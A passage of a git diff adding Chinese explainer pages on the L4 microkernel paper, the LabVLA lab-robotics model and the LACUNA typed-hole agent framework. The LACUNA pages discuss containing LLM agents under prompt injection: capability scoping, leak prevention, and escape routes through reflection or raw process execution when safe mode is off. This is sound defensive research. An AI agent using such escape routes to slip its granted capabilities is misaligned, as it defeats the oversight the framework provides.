-EPERM; + return revoke_downstream_mappings(owner, v); +} +``` + +论文 Figure 1 的**堆叠 pager**:统一文件系统 F 把 f₁ 的一页 grant 给用户 A,F 不长期占页——若用 Map,F 要复制全部簿记且地址空间可能被撑爆。 + +## 核心概念三:线程与同步 IPC + +**线程** = 在某地址空间里跑的活动(PC、栈、状态、当前地址空间 ID)。**IPC** 采用**同步会合式**消息: + +- 发送方决定发什么;接收方决定是否收、如何解释 +- 内核**不必维护消息队列**(短消息常走寄存器) + +L3 在 486/50MHz 上短 IPC 约 **10µs(~250 cycles)**;同期 Mach 同场景约 **190µs**。L3 进内核额外开销可低至 **15 cycles**;Mach `get_self_thread` 类调用约 **900 cycles**,其中 x86 进/出内核硬下限仅 **~107 cycles**,其余是 Mach 自身路径。 + +### 代码示例 2:中断当作「硬件线程发来的空 IPC」 + +```c +void nic_driver_thread(void) { + for (;;) { + ThreadId sender; + Message msg = wait_ipc(&sender); + + if (sender == MY_NIC_IRQ_THREAD) { + dma_ring_refill(); + mmio_write(NIC_REG_ACK, 1); + } else if (sender == CLIENT_PORT) { + handle_client_request(&msg); + } + } +} +``` + +内核只把硬件中断**翻译成** IPC;清中断、读端口的**语义**全在驱动里。若 CPU 清中断需特权操作,可在驱动下一次 IPC 时由内核隐式完成。 + +### 代码示例 3:Unix server 式系统调用 + +```c +void client_read(int fd, void *buf, size_t n) { + Message req = { .tag = MSG_UNIX_READ, .words = { fd, n } }; + Message reply; + ipc_call(unix_server_tid, &req, &reply); + memcpy(buf, reply.payload, reply.words[0]); +} + +void unix_server_loop(void) { + for (;;) { + Message req, reply; + ThreadId client = ipc_receive(&req); + if (req.tag == MSG_UNIX_READ) { + reply.words[0] = vfs_read(req.words[0], reply.payload, req.words[1]); + ipc_reply(client, &reply); + } + } +} +``` + +宏内核里 `read()` 是一条内核路径;微内核里是**会合式 IPC**——当内核路径从 900 cycles 压到百 cycle 级,这条账算得过。 + +## 灵活性速写(§3) + +| 组件 | 实现方式 | +|------|----------| +| 物理内存管理 | 管理 σ₀ 的用户态 memory manager,可多层堆叠 | +| 分页 / 文件映射 | Pager:grant/map/flush + IPC | +| 设备驱动 | 普通进程 + MMIO 映射 + 中断 IPC | +| Unix 兼容 | Unix server,syscall = IPC | +| 远程通信 | 通信 server + 网卡驱动 | + +## 性能:拆解「微内核原罪」(§4) + +**Kernel-user 切换**:Ousterhout 测 `getpid` 约 20–30µs;Mach 486/50MHz 约 18µs ≈ 900 cycles,其中 ~107 cycles 是 x86 陷阱硬下限,**800+ cycles 是 Mach 纯开销**。L3 完整调用 123–180 cycles。 + +**地址空间切换**:无标签 TLB 的 CPU 换页表可能很贵;Liedtke 在 Pentium 上用**段寄存器 multiplex** 把切换压到约 **15 cycles**。 + +**IPC**:Table 2 一字节 echo RPC——L3 ~10µs,Mach 486 ~230µs。差距主要来自内核体量与会合式设计,非范式必然。 + +**MCPI**:Chen & Bershad 曾指 Mach+Unix server 比 Ultrix MCPI 高;Liedtke 重读:差异多来自 **Mach 内核自身 cache miss**,非用户/系统冲突特有。瘦内核(L3 短 IPC <1KB)可缓解。 + +## 可移植性悖论(§5) + +微内核**不应追求**一份源码跑遍所有 CPU——它像**手写优化的微码层**,换芯片要换算法(486→Pentium 地址空间实现大改)。但**上层 server** 用稳定 IPC 接口,整系统反而更易迁移。这是有意为之的诚实。 + +## 与 Mach 1986 对照 + +| 维度 | Mach | L4(本篇) | +|------|------|------------| +| 目标 | UNIX 兼容研究平台 | 证明微内核可又快又灵活 | +| IPC | Port + 内核缓冲 | 同步会合,极简 trap | +| 内存 | Memory object | Grant/Map/Flush 递归构造 | +| 驱动 | 常进内核 | 一律用户态 + 中断 IPC | + +## 后世演化 + +| 年代 | 里程碑 | +|------|--------| +| 1993 | L3:IPC 比 Mach 快数量级 | +| 1995 | 本篇:概念最小集 + 性能辩护 | +| 1997 | L4Linux:Linux personality 低开销 | +| 2009+ | seL4:能力模型 + 形式化验证 | +| 2016+ | Fuchsia Zircon 等商业化探索 | + +## 读完后应带走的五句话 + +1. **微内核 = 最小可信计算基座**,每个原语都要能辩护「移出去会不会做不成系统」。 +2. **Grant/Map/Flush + 同步 IPC + UID** 足以搭出完整 OS。 +3. **慢**先查 cycle 账,别急着怪范式。 +4. **灵活**来自原语少且通用,而非内核预置一切策略。 +5. **内核不可移植是特性**;server 生态才可移植。 + +## 延伸阅读 + +- Liedtke (1993), *Improving IPC by Kernel Design* +- Hartig et al., *The Performance of µ-Kernel-Based Systems*, SOSP 1997 +- Elphinstone & Heiser, *From L3 to seL4*, SOSP 2013 +- 本库:[Mach 1986](mach-rashid-1986.md)、[KVM 2007](kvm-2007.md) + +## 参考链接 + +- 论文 PDF:https://os.itec.kit.edu/downloads/sosp95-mkernel-construction.pdf +- ACM DOI:https://doi.org/10.1145/224056.224075 +- L4 家族文档:https://os.inf.tu-dresden.de/L4/doc.html diff --git a/src/content/docs/papers/labvla.md b/src/content/docs/papers/labvla.md new file mode 100644 index 000000000..e88833cd5 --- /dev/null +++ b/src/content/docs/papers/labvla.md @@ -0,0 +1,321 @@ +--- +title: LabVLA —— 把视觉-语言-动作模型种进科学实验室 +来源: https://arxiv.org/abs/2606.13578 +日期: 2026-06-13 +分类: 机器学习 +子分类: 机器人 +provenance: pipeline-v3 +--- + +# LabVLA:把视觉-语言-动作模型种进科学实验室 + +## 零、一句话理解这篇论文 + +LabVLA 解决的核心问题是:**AI 会读文献、会做假设、会排实验步骤,但走到实验台前就"瘫痪"了。** +论文把 VLA(视觉-语言-动作模型)从家庭桌面场景拉到真实的科学实验室,让机器人能读懂实验方案并亲手执行。 + +--- + +## 一、先做一个日常类比 + +想象一个刚毕业的化学系学生: + +- 他能读懂实验手册(语言理解 ✅) +- 他能看到烧杯、温度计、移液器(视觉感知 ✅) +- 但他从未亲手做过滴定实验(动作执行 ❌) + +这个学生就像目前最先进的 AI 模型。VLA 模型就是给这个"实习生"配了一副机械手臂,让它把纸面上的步骤变成物理动作。 + +但实验室场景和家庭场景有三大差异: + +1. **物品更精细**:烧杯里的液体是透明的,机器人很难"看清"液位 +2. **步骤更严格**:实验室流程是固定的,不能像倒垃圾一样随便做 +3. **容错率极低**:把 10ml 溶液当成 100ml 会导致整个实验报废 + +LabVLA 就是为了解决这三个痛点而生的。 + +--- + +## 二、核心概念拆解 + +### 2.1 什么是 VLA 模型? + +VLA = Vision-Language-Action。它把三个能力融合在一个模型里: + +| 能力 | 类比 | 模型中的角色 | +|------|------|-------------| +| 视觉(Vision) | 用眼睛看烧杯里的颜色 | 多模态编码器 | +| 语言(Language) | 读懂"取 5ml 盐酸"的指令 | 语言理解模块 | +| 动作(Action) | 控制机械臂拧开瓶盖 | 动作输出模块 | + +传统机器人是"写代码 -> 按代码动作"。VLA 是"看场景 -> 理解指令 -> 自己决定动作"。 + +### 2.2 论文的两个核心贡献 + +**贡献一:RoboGenesis —— 实验数据的"工厂"** + +现实中的实验室操作数据几乎没有。没有数据,VLA 模型就学不会。 + +RoboGenesis 是一个**基于仿真的数据生成引擎**。它的思路是: + +``` +原子技能(开瓶盖、倒液体、搅拌) + → 组合成实验工作流(16步化学实验) + → 加入随机化(摆位、光照、遮挡、视角) + → 用模拟器运行 → 过滤掉失败的 + → 输出结构化的演示数据 +``` + +它支持 16 种不同的机器人平台(13 种单臂 + 3 种双臂),包括 UR5e、Franka、Rizon 4、Festo 等。 + +**贡献二:LabVLA 训练配方 —— FAST + Flow Matching** + +LabVLA 用了 Qwen3-VL-4B-Instruct 作为骨干模型,训练分两个阶段: + +``` +阶段 1(FAST 预训练) + 把连续的机器人动作"离散化"成 token + 让语言模型学会"预测动作 token" + (此时还不连 DiT 动作专家) + +阶段 2(Flow Matching 后训练) + 挂载 DiT(Diffusion Transformer)动作专家 + 用 flow matching 学习"从噪声到动作"的映射 + 用 Knowledge Insulation 防止语言知识被动作训练冲掉 +``` + +**Knowledge Insulation** 是一个巧妙的设计:在阶段 2 训练时,用一个 stop-gradient 挡住 flow loss 对 VLM 前缀的影响,让语言理解部分保持"纯净"。 + +--- + +## 三、关键技术细节 + +### 3.1 FAST:动作 token 化 + +连续的动作(比如机械臂的 7 个关节速度)不能被大语言模型直接处理。FAST 的作用就是把连续值变成离散的 token,就像把连续的汉字变成可以拼写的字符。 + +``` +连续动作 [0.3, -0.1, 0.5, ...] + ↓ FAST VQ-VAE 量化 +离散 token 序列 [127, 48, 203, ...] + ↓ 变成语言模型的词汇 +模型可以像"写文章"一样"写动作" +``` + +### 3.2 Flow Matching vs 传统 Diffusion Policy + +| 方法 | 采样步数 | 延迟 | 适合实时控制? | +|------|---------|------|--------------| +| 传统 Diffusion Policy | ~100 步 | 高 | 不推荐 | +| LabVLA Flow Matching | N=10 步 | 低 | 适合 | + +Flow Matching 的核心优势是**确定性向量场**——采样时只需要 10 步欧拉积分就能得到可用轨迹,而传统扩散策略需要上百步。这对实验室这种需要闭环实时控制的场景至关重要。 + +### 3.3 实验室能力分级 + +论文提出了一个有用的框架,把机器人实验室能力分成 4 级: + +- **Level 1(学徒)**:单步操作 —— 拿杯子、按按钮、开门 +- **Level 2(技术员)**:多步协议 —— 倒液体、加热、搅拌、转运 +- **Level 3(专家)**:精密仪器操作 + 测量记录 + 安全约束 +- **Level 4(科学家)**:根据观察调整方案 + +LabVLA 达到了 Level 2。 + +--- + +## 四、实验结果 + +### 4.1 LabUtopia Benchmark + +在 6 项实验室操作任务上,LabVLA 在分布式(ID)和分布外(OOD)设置下都取得了最佳平均成功率: + +| 方法 | 大小 | ID 平均成功率 | OOD 平均成功率 | +|------|------|-------------|--------------| +| π0 | 3B | 63.3 | 63.2 | +| π0.5 | 3B | 52.4 | 52.1 | +| **LabVLA** | **4B** | **71.1** | **70.0** | + +### 4.2 真实机器人验证 + +在真实的 Franka 机械臂上做了验证,4 项任务(摇动液体、倒液体、磁力搅拌、塞子)在不同条件下(干净/杂乱、分布内/外)各跑 50 次: + +``` +条件 LabVLA DreamZero π0.5 +干净-分布内 86.5 87.0 85.0 +杂乱-分布内 80.0 81.0 76.5 +干净-分布外 80.0 78.0 77.0 +杂乱-分布外 74.0 75.5 71.5 + +LabVLA 在"干净-分布外"和"杂乱-分布外"均排名第一 +``` + +### 4.3 数据可迁移性 + +最有趣的是:即使换成其他 VLA 模型(X-VLA),在 LabEmbodied 数据上微调后也显著提升了: + +``` +ID 平均提升:+15.0% +OOD 平均提升:+19.3% +``` + +这说明 LabEmbodied 数据本身有价值,不只属于 LabVLA。 + +--- + +## 五、代码示例 + +### 示例 1:模拟 LabVLA 的推理流程 + +虽然无法直接运行,但这个伪代码展示了 VLA 从"看 + 读"到"动"的完整流程: + +```python +# 输入:实验方案的文本指令 + 机器人看到的当前画面 +instruction = "取 10ml 0.1M HCl 溶液,缓慢倒入 250ml 烧杯中" +observation = robot.camera.capture() # 图像帧 +robot_state = robot.get_state() # 当前关节角度、位姿 + +# VLA 模型内部处理(简化版) +# 1. 视觉编码:把图像变成特征向量 +vision_features = vl_encoder.encode(observation) + +# 2. 语言编码:把指令变成特征向量 +language_features = lm_encoder.encode(instruction) + +# 3. 融合:视觉 + 语言 + 机器人状态 → 动作 token +action_tokens = model.predict( + vision=vision_features, + language=language_features, + robot_state=robot_state +) + +# 4. 将离散 token 解码为连续动作 +actions = fast_decoder.decode(action_tokens) +# actions 形状: [chunk_len, 7] → 7个关节的未来 N 步控制量 + +# 5. 执行前 1 步 +robot.apply_action(actions[0]) +``` + +### 示例 2:FAST 动作 token 化的原理示意 + +```python +import torch +import torch.nn as nn + +# 假设连续动作空间是 7 维(7 轴机械臂) +ACTION_DIM = 7 +LATENT_DIM = 32 +NUM_CODEBOOK_ENTRIES = 1024 + +class FASTTokenizer(nn.Module): + """ + FAST 的核心是把连续动作"量化"成离散 token。 + 这用一个 VQ-VAE 实现: + - Encoder: 连续动作 → 低维潜在表示 + - Codebook: 潜在空间被离散化成 1024 个"簇" + - 每个动作被映射到最近的簇索引 → 这就是一个 token + """ + def __init__(self): + super().__init__() + self.encoder = nn.Linear(ACTION_DIM, LATENT_DIM) + self.codebook = nn.Embedding(NUM_CODEBOOK_ENTRIES, LATENT_DIM) + + def encode(self, actions: torch.Tensor) -> torch.Tensor: + """ + 输入: actions [batch, action_dim] → 例如 [6] + 输出: token_ids [batch] → 例如 [42, 1023, 7, ...] + """ + latent = self.encoder(actions) # [batch, 32] + codebook = self.codebook.weight # [1024, 32] + + # 找每个动作最近的 codebook entry + dist = torch.cdist(latent, codebook) # [batch, 1024] + token_ids = torch.argmin(dist, dim=1) # [batch] + return token_ids # 交给语言模型做"下一个 token 预测" + + def decode(self, token_ids: torch.Tensor) -> torch.Tensor: + """逆过程:从 token 恢复连续动作""" + latent = self.codebook(token_ids) # [batch, 32] + actions = self.encoder(latent) # [batch, 7] + return actions +``` + +### 示例 3:Knowledge Insulation 在训练中的实现 + +```python +def labvla_training_step(model, batch): + """ + 阶段 2 的训练:Flow Matching 后训练 + Knowledge Insulation + + 关键设计:flow loss 只能更新 DiT 动作专家, + 不能反向传播到 VLM 前缀(防止语言知识被冲掉) + """ + # 前向传播:VLM 前缀输出隐藏状态 + with torch.no_grad(): # 关键:冻结 VLM 前缀的梯度 + prefix_hidden = model.vlm_prefix( + vision=batch.vision, + language=batch.instruction, + robot_state=batch.robot_state + ) + + # DiT 动作专家接收 VLM 的输出作为条件 + # 这里可以正常计算梯度 + action_pred = model.dit_expert( + noisy_action=batch.noisy_actions, + condition=prefix_hidden.detach() # detach 确保不反向传到 VLM + ) + + # Flow matching loss: 预测速度场 + flow_loss = compute_flow_matching_loss( + pred=action_pred, + target=batch.action_velocity + ) + + # 同时保留 FAST token loss(让 VLM 继续学动作 token) + fast_loss = model.compute_fast_loss( + hidden=prefix_hidden, + targets=batch.action_tokens + ) + + # 总损失 = FAST 部分更新 VLM + flow 部分只更新 DiT + total_loss = fast_loss + flow_loss + total_loss.backward() + return total_loss +``` + +--- + +## 六、意义与局限 + +### 为什么重要? + +1. **首次系统性地把 VLA 引入科学实验室**——不是某个具体操作的 demo,而是从数据生成到训练配方到评测基准的一整套方案 +2. **数据瓶颈的解决思路**——用仿真数据工厂 + 领域随机化来弥补真实数据的不足 +3. **训练配方的工程创新**——FAST + Flow Matching + Knowledge Insulation 的组合,对后续研究有借鉴价值 + +### 还有哪些挑战? + +- **Level 3 还没到**:精密仪器(移液器、离心机、PCR 仪)的操作需要更高的精度 +- **安全约束还没集成**:化学实验室涉及危险化学品,目前的模型没有内置安全机制 +- **仿真到现实的 gap**:虽然 Real-World 验证表现不错,但距离全自动化实验室还有距离 + +--- + +## 七、延伸思考 + +这篇论文让我想到一个更根本的问题:**"理解"和"执行"是同一个东西吗?** + +VLA 模型试图回答"是"——只要把视觉、语言、动作在同一个模型里训练,理解自然会导致执行能力。但也许真正的突破点不在模型架构,而在**数据质量和场景丰富度**。 + +LabVLA 最大的贡献可能不是模型本身,而是它证明了:**当数据质量和场景覆盖度够高时,现有的 VLM 骨干模型可以被很好地"接地"到物理世界中。** + +--- + +## 参考 + +- 论文 arXiv: [2606.13578](https://arxiv.org/abs/2606.13578) +- 项目主页: [https://zjunlp.github.io/LabVLA/](https://zjunlp.github.io/LabVLA/) +- 模型权重: [Hugging Face](https://huggingface.co/zjunlp/LabVLA) +- 代码: [GitHub](https://github.com/zjunlp/LabVLA) +- 相关基线:[π0](https://www.physicalintelligence.company/) (Physical Intelligence), [OpenVLA](https://openvla.github.io/) (Stanford) diff --git a/src/content/docs/papers/lacuna-program-holes.md b/src/content/docs/papers/lacuna-program-holes.md new file mode 100644 index 000000000..be363e0b7 --- /dev/null +++ b/src/content/docs/papers/lacuna-program-holes.md @@ -0,0 +1,322 @@ +--- +title: LACUNA — 把 LLM Agent 写成「可递归的类型化程序洞」 +来源: https://arxiv.org/abs/2605.28617 +日期: 2026-06-13 +子分类: 类型与 PL 理论 +分类: 编程语言 +provenance: pipeline-v3 +--- + +## 从日常类比开始:装修里的「待填槽位」 + +你请人装修厨房。有两种做法: + +1. **遥控式**:你站在门外,每次只喊一句——「把瓷砖贴上」「装水龙头」。工人做完一步你再喊下一句。流程、节奏、上下文全在你手里,工人只能执行**单步动作**。 +2. **图纸式**:你画好平面图,在需要「现场判断」的地方标出**虚线框**——「此处选台面材质」「此处排布插座」。工人走进现场,按框填空,但**每块填空必须符合图纸上的尺寸与接口**;填错了整块拆掉重来,已装好的柜子不会被半拉子工程弄坏。 + +今天大多数 LLM Agent 更像第一种:ReAct、Function Calling 由**外层 runtime** 拥有循环、上下文和调度,模型每次只吐**一个工具调用**或一小段 JSON。 +**Code-as-action** 让模型直接写代码,表达能力上去了,但又出现新问题:runtime 仍是「上帝」,模型写的代码**不能合法地改写控制流**;若让模型写的代码真的去驱动 runtime,一次 prompt injection、错工具、半途中断,破坏面会比「单步动作」大得多。 + +**LACUNA**(*Safe Agents as Recursive Program Holes*,Zhao 等,EPFL / Martin Odersky 组,arXiv [2605.28617](https://arxiv.org/abs/2605.28617))提出第三种路径:在宿主程序里留一个**类型化的洞(typed hole)**,执行到此处时由 LLM **生成 Scala 代码**填满;**先经编译器类型检查,通过才运行,失败则环境零副作用并重试**。洞里的代码还可以再调用 `agent`,于是 ReAct、子 Agent、并行分解、技能库都变成**普通控制流**,而不是框架硬编码的模式。 + +论文名字 *Lacuna* 即拉丁语「空隙、空白」——程序里那块等你填的洞。 + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 论文 | *LACUNA: Safe Agents as Recursive Program Holes* | +| 作者 | Yaoyu Zhao, Yichen Xu, Oliver Bračevac, Cao Nguyen Pham, Frank Zhengqing Wu, **Martin Odersky** | +| 机构 | EPFL | +| 提交日期 | 2026-05-27 | +| 核心原语 | `def agent[T](task: String): T` | +| 实现语言 | Scala 3(利用运行时重编译 + capture checking) | +| 底层机制 | `eval[T](source: String)` — 在**调用点词法作用域**内对字符串源码做二次编译 | +| 评测 | 自研类型测试 ~400 例、BrowseComp-Plus、τ²-bench、AgentDojo 注入攻击 | + +一句话:**Agent 的一次「行动」= 宿主程序中的一个类型洞;LLM 填的是整段可编译代码,不是单条 tool call。** + +--- + +## 为什么重要 + +### 1. 弥合「runtime」与「模型代码」的裂缝 + +传统分工: + +- **Runtime**:while 循环、消息历史、工具路由、子 Agent 协议 +- **模型**:产出下一个 action(JSON / 单次 `read_file`) + +LACUNA 把 **model call 嵌进程序**,在**需要类型 `T` 的值的地方**调用 `agent[T](task)`。控制流(`if`、`while`、尾递归、`.par.map`)由**生成代码**书写,runtime 只提供 `agent` 这一个原语。 + +### 2. 安全不靠「沙箱祈祷」,靠**编译器全有或全无** + +Python `exec`、无约束 tool call:语句按顺序执行,类型错误**跑到那一行才炸**,前面副作用可能已经写入 `balance -= 50`。 + +LACUNA:**整段 snippet 要么全部通过类型检查,要么整段拒绝**——拒绝时**一行都不执行**。论文称此为 typed hole 的 **atomicity(原子性)**。 + +### 3. 工具 = 普通函数,权限 = 词法作用域 + +不需要单独的 tool registry + JSON schema:在作用域里可见的函数就是工具。开启 Scala 3 **capture checking** 后,文件句柄、网络 `IO` 等**能力(capability)**随类型流动;模型生成的代码**不能把手里的 capability 泄漏到洞外**。 + +### 4. 与相近工作的差异(读论文时的坐标系) + +| 方向 | 代表 | Lacuna 的不同 | +|------|------|----------------| +| Code-as-action | CodeAct 等 | 仍由 runtime 拥有主循环 | +| 递归语言模型 RLM | Zhang et al. 2025 | REPL 先执行再发现问题;Lacuna **先类型检查再执行** | +| LMQL / DSPy | 约束单次 LLM I/O | 只约束**一次调用**的输入输出形状 | +| ChatLSP | 编辑期代码补全 | 人在环;Lacuna 是**运行时递归行动** | + +--- + +## 核心概念 + +### 概念 1:`agent[T](task)` — 类型化的程序洞 + +```scala +def agent[T](task: String): T +``` + +- `task`:自然语言任务描述 +- `T`:调用点**期望的返回类型**(通常由 Scala 类型推断,不必手写) +- 执行到此处 → 组装 prompt(系统指令、期望类型 `T`、调用点周围源码、可用变量列表、`task`)→ LLM 返回 Scala 源码 → **在调用点词法环境中编译** → 成功则求值并返回 `T`,失败则把**编译器诊断**喂回模型重试 + +生成代码可以是**表达式或语句块**:读局部变量、定义辅助函数、分支循环、调用工具、**嵌套 `agent`**。 + +### 概念 2:递归组合(Recursive Program Holes) + +外层 `agent` 生成的代码里可以再写: + +```scala +topics.par.map(topic => agent[String](s"Research: $topic")) +``` + +每个嵌套洞有自己的 `T` 和 `task`,且在**外层 snippet 已引入的变量与结构**之上检查——子问题带着更丰富的上下文。 + +递归深度可由 runtime **配置上限**;无上限时理论上可能无限嵌套(与复杂任务和意外死循环难以区分)。 + +### 概念 3:`eval` — 静态语言里的「动态求值」 + +`agent` 建立在编译器内建的 `eval[T](source)` 上,流程: + +1. **Rewrite**:从类型化 AST 提取 `bindings`、`expectedType`、`enclosingSource` +2. **Splice**:把模型字符串拼进带占位符的包围源码 +3. **Recompile**:用**同一套编译器选项**(含 capture check)再编译 +4. **Extract & Evaluate**:加载 class、在原线程求值 + +关键洞见:**不另写安全检查器**,复用宿主语言编译器的健全性。 + +### 概念 4:编译失败驱动的自修正循环 + +默认最多重试若干次(可配置)。仍失败则抛 `EvalCompileException`,或使用 `agentSafe[T]` 得到 `EvalResult[T]`(`Success` / `Failure(diag)`)。 + +BrowseComp-Plus 上约 **8.6%** 生成在运行前被拒,平均 **0.7** 次重试/查询,**91.4%** 端到端编译成功率。 + +### 概念 5:能力安全与信息流 + +在 adversarial 设定(prompt injection)下,模型可能被带偏,但**只能调用当前洞作用域已绑定的能力**。 +论文用 `Classified[T]` + 嵌套 `local.agent` 演示:敏感合同正文不进云端模型,本地可信模型在 **pure** 的 `map` 闭包内处理,capture 检查禁止把内容 leak 到网络。 + +建议开启 Scala **safe mode**,禁用反射与裸 `Process` 执行——否则存在绕过类型边界的逃生口。 + +--- + +## 代码示例 1:过滤素数 — 洞如何「看见」局部变量 + +宿主程序先定义数据,再让模型填洞;**类型 `List[Int]` 约束返回值**,模型不能交回 `String`。 + +```scala +val xs = List(0, 1, 2, 4, 7, 9, 10) + +val r = agent[List[Int]]("filter the prime numbers from xs") + +// 模型可能生成(经编译器接受后执行): +// def isPrime(n: Int): Boolean = +// n > 1 && (2 until n).forall(d => n % d != 0) +// xs.filter(isPrime) + +// r == List(2, 7) +``` + +要点: + +- `xs` 在词法作用域内,生成代码**直接引用** +- 局部辅助函数 `isPrime` 允许 +- 若模型返回 `xs.filter(_.isOdd)` 但类型标成 `List[String]`,**编译失败,无副作用** + +--- + +## 代码示例 2:ReAct 循环 — 尾递归形式的 `agent` + +ReAct(Reason + Act)在 Lacuna 里不必框架内置,写成**尾递归**:每轮 snippet 调用工具、更新状态,最后再次 `agent[T](task)`,直到能直接返回 `T`。 + +```scala +def solveResearch(task: String): Report = { + // 第一次进入洞 + agent[Report](task) +} + +// 第 1 轮模型生成的 snippet 可能长这样: +val raw = searchWeb("transformer architecture 2024") +val notes = parseResults(raw) +agent[Report](task) // 尾调用:同一 T,上下文更丰富 + +// 第 2 轮可能: +val draft = summarize(notes) +agent[Report](task) + +// 最终轮:信息足够,直接构造 Report +Report.fromSections(notes, draft) +``` + +与 RLM 类似,都是「代码里再调模型」;差异是**每一轮 snippet 先过类型检查**,且每轮共享同一返回类型 `T`,迫使循环围绕**同一目标类型**收敛。 + +--- + +## 代码示例 3:原子性 — 半对半错不会弄脏状态 + +```scala +var balance: Int = 100 + +agent[Int]("subtract 50 and return the new balance") + +// 模型错误生成: +// balance -= 50 +// s"remaining: $balance" // 类型 String,不是 Int + +// 结果:EvalCompileException,balance 仍为 100 +``` + +若在 Python `exec` 里,`balance -= 50` 可能已执行才在字符串格式化处报错——**状态不一致**。Lacuna 的「整段接受或整段拒绝」专为消除这类**部分执行**。 + +--- + +## 代码示例 4:能力不能逃逸作用域 + +```scala +trait IO extends caps.SharedCapability +def withIO[T](op: IO^ => T): T = op(new IO {}) +def readFile(io: IO, path: String): String = ??? + +// 合法:在块内用完 IO,返回纯 String +withIO[String] { io => + agent("read /etc/hosts using io") +} +// 生成:readFile(io, "/etc/hosts") → OK + +// 非法:想把带 IO 能力的函数泄漏出去 +withIO[String => String] { io => + agent("return a file reader using io") +} +// 生成:(p: String) => readFile(io, p) +// 编译错误:Capability io outlives its scope +``` + +--- + +## 能表达哪些 Agent 模式? + +论文第 5 节证明**单一原语**足够表达常见架构(均为例程级控制流,非内置协议): + +| 模式 | Lacuna 写法 | +|------|-------------| +| **Skill / 技能** | 普通函数 `def reviewPR(diff: Diff): Review`,体内可全委托 / 半委托 / 全硬编码 `agent` | +| **ReAct** | 尾递归 `agent[T]` | +| **子 Agent** | 嵌套 `agent[U]`,子洞见到更多中间绑定 | +| **并行** | `items.par.map(x => agent[...](...))` | +| **多模型规划** | 不同洞绑定不同 `llm` 实例(实现层配置) | +| **程序性记忆** | REPL 里重定义同名函数,后续 `agent` 解析到新实现 | + +--- + +## 实验结果(论文摘要) + +### BrowseComp-Plus(复杂检索 + 工具) + +| Agent 模型 | 准确率 | 检索 Recall | 平均重试 | +|------------|--------|-------------|----------| +| deepseek-v4-flash | **27.1%** | 34.5% | 0.7 | +| gemini-3.1-flash-lite | 26.2% | 27.9% | 0.4 | +| gpt-5.4-mini | 9.2% | 16.2% | 0.5 | + +- 约 **8.6%** 生成被编译器拒绝 +- 原语不拖后腿:强模型能做多轮搜索(文中 ~5.9 轮、~15.5 次搜索/题) + +### τ²-bench(多轮客服对话 + 工具) + +deepseek-v4-flash + Lacuna:**76.0%** / 392 任务,与原生 Tool Calling 基线**同量级**(部分域 Lacuna 更高或略低)。对话代码更易类型错误(retail 域拒绝率 ~22.4%),重试环吸收大部分失败。 + +### AgentDojo(prompt injection) + +在 TACIT / CaMeL 对比下,Lacuna 任务完成率(Utility)具竞争力;攻击成功率(Attack)在多数设置接近 **0**(个别配置有少量成功,论文如实报告)。 + +--- + +## 优势与局限 + +### 优势 + +1. **表达力**:模型写**真实控制流**,而非被 runtime 菜单限制 +2. **安全默认**:静态类型 + 可选 capture → 权限与数据流由编译器证明 +3. **可组合**:嵌套洞 = 分而治之,上下文随程序文本累积 +4. **诊断即反馈**:编译错误比「运行时报错」更适合驱动 LLM 自修正 +5. **工具零胶水**:函数即工具,无 JSON schema 维护负担 + +### 局限 + +1. **绑定 Scala 3 生态**:`eval`、capture checking 是原型关键;移植需宿主支持**进程内重编译** +2. **模型必须会写类型正确代码**:弱模型拒绝率高(如 gemini-lite 在 telecom 域 ~89% 被拒) +3. **不解决停机与资源耗尽**:需额外预算、深度上限、超时 +4. **safe mode 必须开**:否则反射 / `Process` 可绕过 +5. **异常语义**:外层 `try` 会捕获**嵌套洞**的编译失败,需用 `agentSafe` 精细处理 + +--- + +## 与工程实践的映射 + +若你用过 **Cursor / Claude Code** 的「写代码调工具」、**MCP** 工具描述、或 **DSPy** 签名,可把 Lacuna 想象成: + +> 把「下一步干什么」从**协议消息**升级成**宿主语言里的一段程序**,且这段程序在提交前要经过**和手写代码同一套类型检查**。 + +它不取代 MCP(工具仍可包装成函数注入作用域),而是回答:**当 Agent 越来越像程序员时,谁来保证它写的「微型程序」不会越权、不会半执行?** —— 论文的答案是:**让编译器站在 Agent 与副作用之间**。 + +--- + +## 零基础自检清单 + +读完后应能回答: + +1. **Lacuna 的「洞」和 ReAct 的一步有何本质区别?** + → 洞提交的是**整段类型化代码**;一步 ReAct 是**单次推理/工具调用**,循环在外层。 + +2. **为什么拒绝编译能保护 `balance` 例子?** + → **Atomicity**:未通过检查的 snippet **完全不执行**。 + +3. **`T` 在 API 里起什么作用?** + → 调用方声明**需要什么类型的值**;编译器据此验收 LLM 代码。 + +4. **递归洞带来的好处?** + → 子任务在**更窄、信息更富**的词法环境中生成代码(map-reduce 式分解)。 + +5. **论文主要评测说明了什么?** + → 类型纪律**成本很低**(少次重试),复杂任务上与强基线**可比**,能力层对注入**有界**。 + +--- + +## 延伸阅读 + +- **ReAct**:Yao et al., 2023 — Lacuna 第 5.2 节将其编码为尾递归 `agent` +- **Recursive Language Models**:Zhang et al., 2025 — 最接近的「代码里再调 LLM」先验 +- **TACIT / capture checking**:Odersky et al., 2026 — Agent 能力与安全评测.harness +- **τ²-bench**:多轮工具对话基准 +- **BrowseComp-Plus**:固定语料上的困难检索任务 + +--- + +## 参考 + +- Zhao, Y., Xu, Y., Bračevac, O., Pham, C. N., Wu, F. Z., & Odersky, M. (2026). *LACUNA: Safe Agents as Recursive Program Holes*. arXiv:2605.28617. https://arxiv.org/abs/2605.28617 +- HTML 全文:https://arxiv.org/html/2605.28617v1 diff --git a/src/content/docs/papers/lacuna-safe-agents-as-recursive-program-holes-arxiv-2605-28617.md b/src/content/docs/papers/lacuna-safe-agents-as-recursive-program-holes-arxiv-2605-28617.md new file mode 100644 index 000000000..a0aecbf9c --- /dev/null +++ b/src/content/docs/papers/lacuna-safe-agents-as-recursive-program-holes-arxiv-2605-28617.md @@ -0,0 +1,223 @@ +--- +title: LACUNA —— 把 AI Agent 写成「递归的程序孔洞」 +来源: https://arxiv.org/abs/2605-28617 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# LACUNA:把 AI Agent 写成「递归的程序孔洞」 + +## 一、一个日常类比:拼图里的空缺 + +想象你在拼一幅巨大的拼图。大部分拼图块你已经亲手放好了——这些是你写的代码,变量、函数、控制流,一切井井有条。 + +但现在有一块拼图你找不到。这块拼图该是什么形状?你不知道。于是你把这块空缺的位置、周围已经拼好的图案、以及"这块拼图应该是什么"的描述,交给一个朋友去画。朋友画好后,你拿回去试——如果大小正好严丝合缝,就放进去;如果大了、小了、或者形状不对,就把朋友叫回来,告诉他哪里不合适,让他重画。 